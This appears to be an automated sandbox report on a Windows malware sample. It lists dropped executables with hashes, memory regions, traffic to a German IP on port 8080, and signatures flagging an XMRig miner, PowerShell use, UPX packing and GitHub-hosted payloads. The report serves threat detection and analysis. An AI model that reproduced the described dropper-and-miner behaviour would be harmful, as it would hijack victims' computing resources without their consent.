C:\Windows\System\aNobWyF.exe

C:\Windows\System\aNobWyF.exe

C:\Windows\System\YLpEVvE.exe

C:\Windows\System\YLpEVvE.exe

C:\Windows\System\YWeMYra.exe

C:\Windows\System\YWeMYra.exe

C:\Windows\System\oMOWxhT.exe

C:\Windows\System\oMOWxhT.exe

C:\Windows\System\pwmOnik.exe

C:\Windows\System\pwmOnik.exe

C:\Windows\System\PnECxNj.exe

C:\Windows\System\PnECxNj.exe

C:\Windows\System\siOLiSS.exe

C:\Windows\System\siOLiSS.exe

C:\Windows\System\KRIQXvD.exe

C:\Windows\System\KRIQXvD.exe

C:\Windows\System\NUGHOGo.exe

C:\Windows\System\NUGHOGo.exe

C:\Windows\System\NMKoSem.exe

C:\Windows\System\NMKoSem.exe

C:\Windows\System\wdKCujs.exe

C:\Windows\System\wdKCujs.exe

C:\Windows\System\lAcDupg.exe

C:\Windows\System\lAcDupg.exe

C:\Windows\System\fgnZKLc.exe

C:\Windows\System\fgnZKLc.exe

C:\Windows\System\LsOrQyI.exe

C:\Windows\System\LsOrQyI.exe

C:\Windows\System\tuBuSYm.exe

C:\Windows\System\tuBuSYm.exe

C:\Windows\System\EcIcdCw.exe

C:\Windows\System\EcIcdCw.exe

C:\Windows\System\tXvyjvZ.exe

C:\Windows\System\tXvyjvZ.exe

C:\Windows\System\vTYImMu.exe

C:\Windows\System\vTYImMu.exe

C:\Windows\System\EHPEGoB.exe

C:\Windows\System\EHPEGoB.exe

C:\Windows\System\yryMQJf.exe

C:\Windows\System\yryMQJf.exe

C:\Windows\System\qFvZkbF.exe

C:\Windows\System\qFvZkbF.exe

C:\Windows\System\nEwtmrA.exe

C:\Windows\System\nEwtmrA.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2092-0-0x00000000001F0000-0x0000000000200000-memory.dmp

memory/2092-1-0x000000013F320000-0x000000013F712000-memory.dmp

\Windows\system\CKlACnX.exe

MD5 7a3436f4f8957471b533b03c2437480a
SHA1 49281b0c542feacba269e528545e8d7b520ad130
SHA256 e07880696a583f6f50a866b7dca7433695aa4f7368c23f1ad2e5c26569f18c6d
SHA512 c97cadd17a436651ce908d2bac76e41fc9d5a3caf6b57cb3555a4a5c348c8e295d57de0278ff6407c10a2c2f59b1b62d58e0643befbdf758fc322bb30dccc08f

memory/2504-8-0x000000013FBC0000-0x000000013FFB2000-memory.dmp

memory/2092-7-0x000000013FBC0000-0x000000013FFB2000-memory.dmp

memory/2492-14-0x000007FEF5AFE000-0x000007FEF5AFF000-memory.dmp

C:\Windows\system\ODVXDOO.exe

MD5 aedbb8160ca35eed1fe53fa02a95b971
SHA1 69ec76f8fb2aa50d97afcdafc7b6f20d347151e0
SHA256 997e87f6eab7ce202c12828a976284d38cfa367e5fd2fbd9510ee8beacbdb8c8
SHA512 761675005e649a4129aa34b0a38902b7e3b42a50d097c3d77c3ed3f2982147e56961eb90e86ea37535209c7f6b5c051fa50f91c9facf7f5a62cc559641afcaff

memory/2492-13-0x0000000002C80000-0x0000000002D00000-memory.dmp

\Windows\system\gUmoePo.exe

MD5 f389fef4fbac0517058c27f845bab408
SHA1 26bba44b80e4f423f6d1e629d53d0b63fc667ad2
SHA256 0fc5226eab0fc5bc8931885b3cfb059a98898f6f712651b572b9873afc19cfe2
SHA512 f866ed396540d0a28baa8acd9c108213d85c2fea3192c7571ac316ed2a3510cfd7cc8495e56e3825c4e6bf012ef4ae75465be747a823141b5b9b5d3c78ec2e17

\Windows\system\oIGTReJ.exe

MD5 83fa8ed16a92a09d35a28478c931454c
SHA1 b1ef518fb1706d260f8feea95c374a185b0a1821
SHA256 b7d11e9da5cf1442ebd4f4c73d4a3a36a18ece7b4c2eec67a559793656651024
SHA512 31c0327aa1389200ace00c86f38dfc0031197e01f0bd119f3cf32c0d21250e757bb405e0556a54702d8f67e68897b0507f700e8a1df9b6a96b6822a8aebf1b84

memory/2492-24-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2092-31-0x000000013F7E0000-0x000000013FBD2000-memory.dmp

memory/1992-34-0x000000013F7E0000-0x000000013FBD2000-memory.dmp

memory/2092-35-0x0000000003250000-0x0000000003642000-memory.dmp

memory/2708-27-0x000000013F4B0000-0x000000013F8A2000-memory.dmp

C:\Windows\system\UYNjgSm.exe

MD5 771b17ce7ab81e8ae19a587e73ab26ea
SHA1 3d005679317aa309b47317feb7f38a93165eb8db
SHA256 3224cf7f5a677289ecd6518c2bfc7f5af87da40dfb004e3a01c6970846a391dc
SHA512 a4c7f7f48a7ebce7c91f15bc27016c8211c05ddad6bb572dc984dbf7af25f5ddb058dfd811e87b8825c7600f5a743668c0a70ea8f7149f3cefd7b837787e252f

memory/2092-41-0x0000000002F70000-0x0000000003362000-memory.dmp

memory/2432-48-0x000000013F4B0000-0x000000013F8A2000-memory.dmp

memory/2092-46-0x0000000003250000-0x0000000003642000-memory.dmp

memory/2492-40-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

memory/2428-38-0x000000013F080000-0x000000013F472000-memory.dmp

memory/2492-37-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

\Windows\system\ePYaIyB.exe

MD5 e5fad4f8e0587eec789f3c9ea37844ad
SHA1 c4727e231035ae88c224fd47391e534e643c036e
SHA256 623a9edc7baabe397ba9d6d5ea1e3a1bad5d8c705a092f1a9febede7ff1dad65
SHA512 7b936434c01dc3c5e03a4f74f44023d7a839c97bd7353de97c151504c7786d380f8c8d90fb0b0c5fe2c1199ac4eba1c116253ae8cdb82c0ae7dcfbf26fcc2380

memory/2944-53-0x000000013F440000-0x000000013F832000-memory.dmp

memory/2092-55-0x000000013FD30000-0x0000000140122000-memory.dmp

C:\Windows\system\eXiiJTD.exe

MD5 c0979d575e329b6e35fd46395fe2695b
SHA1 5e540e404f35f1d9d4449f292dfe3064dd42d465
SHA256 3a3b99bc0b075f57a24b994198095a0258640dfc69a6defc47e050a38f562af4
SHA512 3ab88103612e0ab4fd96bbe46d24cbf37bff155e24f35d2b4863cd785266378198d121ffcbe1ec707d83bba677c9802e6d8cc77cb42a0176037aebae2e68eac3

memory/2492-26-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

memory/2492-25-0x0000000002070000-0x0000000002078000-memory.dmp

\Windows\system\KphViNM.exe

MD5 97efb0726adfdb922d9c0cc6e8e14314
SHA1 a0acf0ef450dbfdf68cc9f63c1412a93d2cb8a0f
SHA256 bd93d8df7553c2c43cf38b087efbb0db5e2eb934f5b9032980bc4d20d04164c2
SHA512 e903acfa46e2eaa3a646fe58a898673224fe5c1f5e18f6b11623b38e6bd79712d9aa0aeb34ea5847ad517aa0dab062771f4cef103b245aaa1be62dec08226d80

C:\Windows\system\jjiNDHr.exe

MD5 c53988c9a91096a7fc9bd161e304bda7
SHA1 69adcf6d27f4b92c520adfcd712f84cdef91bb81
SHA256 2c8f4e4d92f15d0b4db8ff153ae47080aa6608fb073e20eaf3188f53ebe6ce99
SHA512 984b8359be5152ed96cfbeb4e80fabe6fd12839839a6dc8596250afb0f7812cb8802c0eb3e7832c7a697c3e9e03030faca5661d7052eeaf4cf5609a2daba5fd1

memory/2776-74-0x000000013F100000-0x000000013F4F2000-memory.dmp

\Windows\system\GFacxhH.exe

MD5 bdf5c64946b051102610d3a49fb4cd37
SHA1 0a7d4a6fe3ac7037f727026e28e096055a91f82d
SHA256 da75b58352c1b723dc4dd7af93b6b8b971414fc9e25ea349c6aacdfe856334f3
SHA512 6ca40777e7016dd73c51ff8635067d28aeead79d7fed6ebf9779258603e7a7ad287a9f4b9d6841de6a29feb3d9f46dc6964a6df8b4fa6a9792f0822ac186dd2b

C:\Windows\system\HjhqejW.exe

MD5 6036e742828b433f3fdbad6fe46c570e
SHA1 b71c0d801394c7ae0628ddb473d1302fed16e953
SHA256 25753b8f3a717d3e70b438eea43bd063c8e1a816181cc32067f093c856b6d7cc
SHA512 6c682151c16bcfba0a64a76fb5315f69873f6b8f3385c93fabd78844311be4a10b56543236a5b33c3e84971c9a40ebc1ca9b38019d0e63b9575a5dc88191e649

memory/1992-162-0x000000013F7E0000-0x000000013FBD2000-memory.dmp

memory/2092-168-0x000000013FD90000-0x0000000140182000-memory.dmp

memory/2492-169-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

C:\Windows\system\mMXnQHy.exe

MD5 4179d2d1808378a4eb8159c6944cbab4
SHA1 75fb75742bab82e4a788784ac031d184652b034d
SHA256 1db5474bec7d0a60b05484701c2423d651df78774fa2dd37bd49cd334eee4b91
SHA512 55aa4884dbe8ca2072fb4886cb8932d8fcc00ecbd8c6fcb4852c4c553717c08b8b23375d58faeddfdc3caafe812cfd01227abfb593a9bd73c21f6b55eaf1aee8

\Windows\system\PkOXnQL.exe

MD5 875ad32e1aae2921f524ef514cae312e
SHA1 8aed13a3f866984dc96051db2dee718fb3830486
SHA256 28e5cc7abacee09aa3b3ee4eec43663c9e42180085281af2e078e9d1e2e89a7e
SHA512 b72bc3105ebabcfac211145f42016158dcbe48cbfb65ef75e4513c245619f8ced8829f7597dc63ced8cc0ad15bf4f93870da3c23434dd207c119ff8e4ee3b915

\Windows\system\LaBLYyC.exe

MD5 45c3e0c5f1a46dc3bd57719618937b47
SHA1 740902a8252d8e55df50b299aa8ab370efbfd1dd
SHA256 1ea28db2c86d4ece0324c0335a8f72f6e84abc2b5b2e6886333abd7377ce5793
SHA512 5b752d677655af6f66d610ae7fbfdc3b318d33dd364705d8067bde6a08f1d0d7f37d13432bc5a518d878e732fbde1cf20c43f1253b8f3a72ffbdd1c13670ccd0

memory/2492-203-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

\Windows\system\CiZUzks.exe

MD5 f1785377d6977cc5b80c2184c3c6615a
SHA1 4de0ec2d274cb3b3d82377842c4ed25017b7caa9
SHA256 21694e00894b2fcdbf4a4e03355baeca7a290b0cb26a46d595536bb0528b6227
SHA512 05e00b990da5b2b64ec1a3f7ce6335d54dd474f3700e212f84e37d80ad4be0d0dde77594ab74740f2cc954be76b6409316ac0b4136b823cec299f84a8b0981e0

memory/2432-369-0x000000013F4B0000-0x000000013F8A2000-memory.dmp

memory/2092-592-0x0000000003250000-0x0000000003642000-memory.dmp

\Windows\system\McwGZrC.exe

MD5 27f844d5a42ef296bd6f8585fe4cdaf5
SHA1 c186f139a14addcdb5ad889247e06f512df69b3b
SHA256 b41e37bcea4bd7cb002af69c0ff504b81b5a3afc028613c4c15513a2268c3c36
SHA512 27a14757a18d51792fc3d0eea987a08685442c841345b9fbf2e1e55675eacd0bd9d557e246940dd96dafec2ac668193ef15f2c6726421a284fea7209642f9d19

\Windows\system\bTmkDVI.exe

MD5 f5d163ffe5d17f23c81e1f2f319885f3
SHA1 3cf92f4da45297b3e5b36d6f69d2bc029f217898
SHA256 615b06bf3ccfad42c0bb78e83d93b44d7fe69506b205e1d284641d677d4bcde6
SHA512 6851b3295cba213f9262fe85f27d5a7b6f186e84c5a35c39096640e4e2a8cf07796720daefc259a7fddf4824bf2866ec4e10898e88f080412107da1cf2c5e777

\Windows\system\OHttPzL.exe

MD5 5fe263ba07e3c78561b55deebf926098
SHA1 aa12798c97a649dbae85cdd18a3c9f9a8071a6f8
SHA256 02719ba7ab67e61ecab091316d6206f10b5f278ae3e0479ddaf04bab6d917c4c
SHA512 ae2cbe60ffd423c11a9dd09b6a81479b0e0f69e99375f6419b9d5fc51006a8db201cad9cd5ac74f612f4591ad9dabba0eb030e2fdc644955a3c26cbe994098a2

\Windows\system\ukQSYaG.exe

MD5 f213783eabd9be999c2e5e58b872d768
SHA1 aaaf36ede5ad15b182ed2d8eb0b5b2b301d72a0c
SHA256 c0449773006c6255062bbe3b7c0c6745b9b6457c741f8a848a26848ac92fa6c7
SHA512 842f31f498e18e047d943a61a8d1fd3285bdf4975b4eafb693bdb201f51d583074a67185a64e1648ef71108c28713a97df6221b57b7bed45abaf7d3808c218ce

memory/2092-154-0x0000000003250000-0x0000000003642000-memory.dmp

\Windows\system\TXpzdpH.exe

MD5 d6d2e2c4a3f16a7f0a5e7e1da6738c32
SHA1 3cf5451325f28954650047163f72e86669348a94
SHA256 a2c39134ab638699f270d64b310230848903703e1f2ebf76838c51c895142e8c
SHA512 6e5d64cbca8ea9bac2d95e34c0d87f055df6ec4d7b8a5c5a763f7d07475f119ebd7c18a3aded64a3a9e577fb49e43e1f3231d75603d248892d04eb3789366636

C:\Windows\system\xnSHUHj.exe

MD5 ea1ac32b66c19a64db46de104c47f9bb
SHA1 ba42f85edbb990d1fcc0c944fcf3494683a85998
SHA256 41632d845a201494abb8b99ca154648982def403eac2e4b77a8b080700e87a9d
SHA512 d017bba9486a0d2297da928713e5e904c305a2580f6c798b1474ddc00c0d99626d8d39a6a91ed48685320b15716b22315776f8b2575404c7667f4b2637072ebc

\Windows\system\VWpXCXf.exe

MD5 8505e7f3078744d01ba9da8218cbbc55
SHA1 7c8c599e82209eae3317fcd64fabe192330606d4
SHA256 cd2a72ec544a3b385eb258fbcae25267f04d1461ff7178ce270c1ca89db73dff
SHA512 6792a5e51057bb90e31c910b2f2c2aee727a0936ea826bfe5bad8a302ffc90bb58667445d74f36f0bfbf59fa0697a7d9c27ea44683c7635486f177afb219d285

C:\Windows\system\lomDjDP.exe

MD5 3d14d75590bdba99f9c000a435c3e63b
SHA1 604aaf973c2ab3c25647797a7d2fc2dd24b42e6e
SHA256 6a9fe6d5129e15e339a941cacfd07abe97f5946e0bee122c75c8ae534202be91
SHA512 29afd2e152095327ce33803a84ea063e3891ac75847eb2df202f6d0ac41a680e833b3b1cc1b6d835d90f28478fcff561e2a32476818bad2ad828251ed22f34be

C:\Windows\system\hpsMIJn.exe

MD5 684d5b027736fbd265e561b441731685
SHA1 a9d51e28a1566911de17140d4926b18d99125124
SHA256 7cef4efed2180b5ca5df1a331e701974dd026031d1e2588b8e80978fcf4e7d59
SHA512 8e4b91bbb3e3aa44fd472be1d526cc108b43579a4e40f53d5184aa256955d516fcd49166be2108d2b739fa0edf81129978441c4a5f87499ecfc4f40619bcbf9a

C:\Windows\system\avckCSe.exe

MD5 0fabab40c8b2f5b4327edf347856a009
SHA1 acc5fa94b2e8b62f13b3530c0c2fc81eb23dd55b
SHA256 faefbff5a28108f8ee3fdbd887209f3210ba48db0a519e51537edcb78fe0f100
SHA512 b996b341e17544c1fc0ed51256871e7c14a31859cb9a48e3aa1532dd969abbd69b267b393d86bbf9f9be045eff773cb2a5572d565ea9edcfa60d327644e28ede

C:\Windows\system\yasqtdR.exe

MD5 59e2cf272c533bc157995cdc9c163fa0
SHA1 b092137b00a29d38c1c0e33695fbac5ce996c910
SHA256 f3084db337d10fae4bef6d59c53cb08834f7131a4823909b3dac1e7fb3b20d29
SHA512 ed9b973c9d53501e949fbb0141a10dad446f9afcae372a322876108f30e9d086bdc31e01577983d2cb3acf4a509548bd58e21d027f32f8a5046ec175206b99dd

\Windows\system\ADrxwTW.exe

MD5 db317fe4156e95a6d6a08b5a21b6b25a
SHA1 e682561b683b5ba4d2c29e37c9fb8c7ebc2f3515
SHA256 983e4c4c3945c4405f9268f76248df03e8c8c42c1772cdcc5857082a9c080731
SHA512 754e4d420ea11f72b2c0f19bb73958fab87d69f882d9127d3c7f35ba2a3fc3d2fcbf228c7e370a8a07a7cf5bcbffe12e705d2075a304e859ebfe53485477a18d

\Windows\system\vgdieTL.exe

MD5 15ea93b940d6aa341a605d760bc3dab5
SHA1 7ffcb46ffb3d99e498aa8c64b5e6a0e3213cd9e8
SHA256 c49fb83c505f22c167ba5097ca0c117f189f832db59f1a676eb5a077dfea9940
SHA512 6ec544c14c069d037b7b22d34f7bc7a92794a6b3a32f99de0d0611844701a99d75f6decc09b5b2cb631a6e47d3e37efad83f8948580478b1a01206f390af779d

\Windows\system\GlUaJIp.exe

MD5 a2f50f7c9e7ce34f1cd2ee80c69ef318
SHA1 81b3fc0de5d29de48f10d23dd50f71621098a14a
SHA256 3d996b0f230c954073d62017fc06b3a07b70ea5db398aac0eba48ddef3cde90b
SHA512 8ba5b0481173f9df177e39007d8e85d83997f0092d7d8d10ac7f0904d86f19905618b8b49de1358ccd9efdb74f6ed493cce015939455dd1de632ec3a2f9f8e4c

memory/2428-112-0x000000013F080000-0x000000013F472000-memory.dmp

\Windows\system\mwWEcqR.exe

MD5 fa89997b6aeb709dcf0bd4fa268f835c
SHA1 2f775619d93a41e4ed0a6c7b20100cf98c35e99c
SHA256 eec0890c82315ac2f1c9785fbda3cb53167eec289a85a8180eb77f9a0ec5ab0f
SHA512 81350dc94b8cbce78981c7b011cbb26a7ef95d0ec7057ec25b2f2040173927a40a2377e263f7f931cb992ab7c2115cb894885b3c59ea4b455db1506fb7a2751b

C:\Windows\system\jyRvaQg.exe

MD5 f44ac74d2481de93055d4f04cbe3f64e
SHA1 18bc90b0bded2b8df3149f7106f027f6f67ceeda
SHA256 9a682f42fa7a7645bbbcb6a3b994d12b2c98077ddec964235125a27ee7cb7bf8
SHA512 73a99038747cf238d45343fce1f44561547f1811146dfcdd5a1825e8ec305f651043ac90e1e9ede93662d155b37a80cfac58a2c98464f0262d32aaf8a16c294d

C:\Windows\system\ddWPCqN.exe

MD5 a4d817806433c25bec0c3e7a50aa894e
SHA1 1c2c114e8f84bd267a1a15ab1eda22c20bb2bc7e
SHA256 7068d5abf2137d3af370a073cc079c3d9ae80ffaab453eeddecaa82de80db330
SHA512 57f7cf2f31646e311e2f94abf1aecad57ad6c51eb98c26cde58f768830e93be26e3af68fecc472377d4546466ca2254fffd026a4e1ae60690e1a9c0f25ae91dd

C:\Windows\system\hSdryMs.exe

MD5 782adf76f8025ca9281000ae3d8da83d
SHA1 8eac14f3e76d418490efafda931297a286c518f5
SHA256 1996b3390e9d60ccf0eb7a0ce5abdbe6c546e79bf02d2b588c50a5b035f90ee5
SHA512 beed54d85ff7ff9f2ff6e2d5f2cf568202a3ae063e5fd47bc5d2db8425730c4f0f2be315930fbfdacbfed6de40540a95210fd16e821fd909878c91709415e896

C:\Windows\system\RKFhkFD.exe

MD5 6a0df5b949754d88e0b102b6b576a7f4
SHA1 c78ff44c3f31a9b805f503f7dac2b86e2afb462c
SHA256 1a58a6d8d1b0f167cc8c53d404d1f3729b59611621c5ca9e130a2b9783abdf21
SHA512 b1589da053ffdb50179dbd361112ff339347523e2960ba851c251ccb88fda19ecfd33cf2c0f2161effabb57cdba05cad467acdc03c62492c54b4bc602299adf2

memory/2092-167-0x0000000003250000-0x0000000003642000-memory.dmp

memory/1836-161-0x000000013F040000-0x000000013F432000-memory.dmp

memory/2708-160-0x000000013F4B0000-0x000000013F8A2000-memory.dmp

C:\Windows\system\UfjpEsM.exe

MD5 6844dc5a088c8ffbab8214a8ff5c866a
SHA1 232c46ee57ada223634c202045d5cf2616a64957
SHA256 c27f533e68e59380c5e864522c2f8761d9faa1cd21049e9d425d6b4b31d882e2
SHA512 66e2f81cea1e4d823974219bb2e726d6629a27e27558b4aba38c2b8da59a3b1445f3bac0a832c1eb2ba7c085a59e5f844cd44d97064c9f5c9f2c2d346e9d5009

memory/2492-150-0x000007FEF5AFE000-0x000007FEF5AFF000-memory.dmp

memory/2492-149-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/1464-148-0x000000013FEE0000-0x00000001402D2000-memory.dmp

memory/2092-130-0x000000013FEE0000-0x00000001402D2000-memory.dmp

C:\Windows\system\xoJLLzR.exe

MD5 68476f388e2736e432154e73b1cc930e
SHA1 4e54d0eb7e3d551bd8f6a4d9f4073fb476e0ef54
SHA256 958b4d88a031755af7166cc3f231230413d59e5772b07a061e5693bd4ace6893
SHA512 94568851e50b4688a0bc2cb5a7e7df71f0108e49ad2ec8f1083f97c76a90a1d7fd9adc6e369e561096b3cd4499cacf861f141bab7f338f81699f587a5f5fca8f

memory/2492-100-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

memory/2092-76-0x000000013F320000-0x000000013F712000-memory.dmp

memory/2492-87-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

C:\Windows\system\oMwjven.exe

MD5 68cf88d94cfceda116028c1801f6adf2
SHA1 9c45fa9ec3e411b87d86f2bd9b764f20ebfb3542
SHA256 1326afb8209e5826873f349d5c7b07a58e24be5a425c3c3b0665493c66d2b428
SHA512 b924f012e3eafea4e970a0c6e86ac993402275069367fac54a60cc34422c1330ece929678b17311ec9b477a40c3f7b556c6c3ec914f8c28305da7c15669a4b25

memory/2504-83-0x000000013FBC0000-0x000000013FFB2000-memory.dmp

memory/2668-73-0x000000013F170000-0x000000013F562000-memory.dmp

memory/2092-72-0x0000000003250000-0x0000000003642000-memory.dmp

memory/2128-61-0x000000013FD30000-0x0000000140122000-memory.dmp

memory/2092-1161-0x0000000003250000-0x0000000003642000-memory.dmp

memory/2944-1408-0x000000013F440000-0x000000013F832000-memory.dmp

memory/2128-5051-0x000000013FD30000-0x0000000140122000-memory.dmp

memory/2776-5052-0x000000013F100000-0x000000013F4F2000-memory.dmp

memory/1464-5055-0x000000013FEE0000-0x00000001402D2000-memory.dmp

memory/1836-5080-0x000000013F040000-0x000000013F432000-memory.dmp

memory/2092-11459-0x0000000003250000-0x0000000003642000-memory.dmp

memory/2092-13954-0x0000000003250000-0x0000000003642000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 12:04

Reported

2024-06-14 12:07

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\uovhQRo.exe N/A
N/A N/A C:\Windows\System\oLNmthv.exe N/A
N/A N/A C:\Windows\System\OwnCKSw.exe N/A
N/A N/A C:\Windows\System\GAJQbVP.exe N/A
N/A N/A C:\Windows\System\DYAbeqw.exe N/A
N/A N/A C:\Windows\System\gRsstgN.exe N/A
N/A N/A C:\Windows\System\YfFaJbS.exe N/A
N/A N/A C:\Windows\System\wScrOdp.exe N/A
N/A N/A C:\Windows\System\jxHATNe.exe N/A
N/A N/A C:\Windows\System\YzoTkNO.exe N/A
N/A N/A C:\Windows\System\lBmpuPL.exe N/A
N/A N/A C:\Windows\System\wekQPAW.exe N/A
N/A N/A C:\Windows\System\ngByfzP.exe N/A
N/A N/A C:\Windows\System\IlktpFw.exe N/A
N/A N/A C:\Windows\System\tsdBcMM.exe N/A
N/A N/A C:\Windows\System\vurWFkZ.exe N/A
N/A N/A C:\Windows\System\kdOMOzv.exe N/A
N/A N/A C:\Windows\System\yfsWgNT.exe N/A
N/A N/A C:\Windows\System\GgksSUO.exe N/A
N/A N/A C:\Windows\System\rUFTdzm.exe N/A
N/A N/A C:\Windows\System\VpjOQtz.exe N/A
N/A N/A C:\Windows\System\HQFQxDe.exe N/A
N/A N/A C:\Windows\System\JkZTslb.exe N/A
N/A N/A C:\Windows\System\QMrKWRF.exe N/A
N/A N/A C:\Windows\System\YMWjuHR.exe N/A
N/A N/A C:\Windows\System\KEkdQvA.exe N/A
N/A N/A C:\Windows\System\YjneNxN.exe N/A
N/A N/A C:\Windows\System\vaXNldY.exe N/A
N/A N/A C:\Windows\System\CKWOPeF.exe N/A
N/A N/A C:\Windows\System\LhMeRPz.exe N/A
N/A N/A C:\Windows\System\mDznAKu.exe N/A
N/A N/A C:\Windows\System\aWVCqTM.exe N/A
N/A N/A C:\Windows\System\GwQeDhw.exe N/A
N/A N/A C:\Windows\System\RUYjrnT.exe N/A
N/A N/A C:\Windows\System\qSZgnIe.exe N/A
N/A N/A C:\Windows\System\VYJIXWa.exe N/A
N/A N/A C:\Windows\System\SecAVTG.exe N/A
N/A N/A C:\Windows\System\UudbGTU.exe N/A
N/A N/A C:\Windows\System\wbOTkBr.exe N/A
N/A N/A C:\Windows\System\DyUXyZz.exe N/A
N/A N/A C:\Windows\System\RMbDlTT.exe N/A
N/A N/A C:\Windows\System\NmBxnIq.exe N/A
N/A N/A C:\Windows\System\mGAYOWf.exe N/A
N/A N/A C:\Windows\System\KYqyAvF.exe N/A
N/A N/A C:\Windows\System\sgfAQFp.exe N/A
N/A N/A C:\Windows\System\HOrdfBW.exe N/A
N/A N/A C:\Windows\System\PDfqhlR.exe N/A
N/A N/A C:\Windows\System\cpMTVYV.exe N/A
N/A N/A C:\Windows\System\yxSrcEG.exe N/A
N/A N/A C:\Windows\System\hZuIvsN.exe N/A
N/A N/A C:\Windows\System\frBtwsH.exe N/A
N/A N/A C:\Windows\System\FQALVgt.exe N/A
N/A N/A C:\Windows\System\vaUNJqe.exe N/A
N/A N/A C:\Windows\System\AOeomQK.exe N/A
N/A N/A C:\Windows\System\OVfuAah.exe N/A
N/A N/A C:\Windows\System\cCccyog.exe N/A
N/A N/A C:\Windows\System\xKMSrui.exe N/A
N/A N/A C:\Windows\System\BtHPgHh.exe N/A
N/A N/A C:\Windows\System\JXGblkP.exe N/A
N/A N/A C:\Windows\System\IaKFLHi.exe N/A
N/A N/A C:\Windows\System\RrjZTis.exe N/A
N/A N/A C:\Windows\System\VOYOKYP.exe N/A
N/A N/A C:\Windows\System\DJTXKeu.exe N/A
N/A N/A C:\Windows\System\GSIzkTr.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\OZWMleX.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\mZbieoG.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ujcRwIG.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\FXVfrRv.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\YaNqXIY.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\SHZhfuY.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
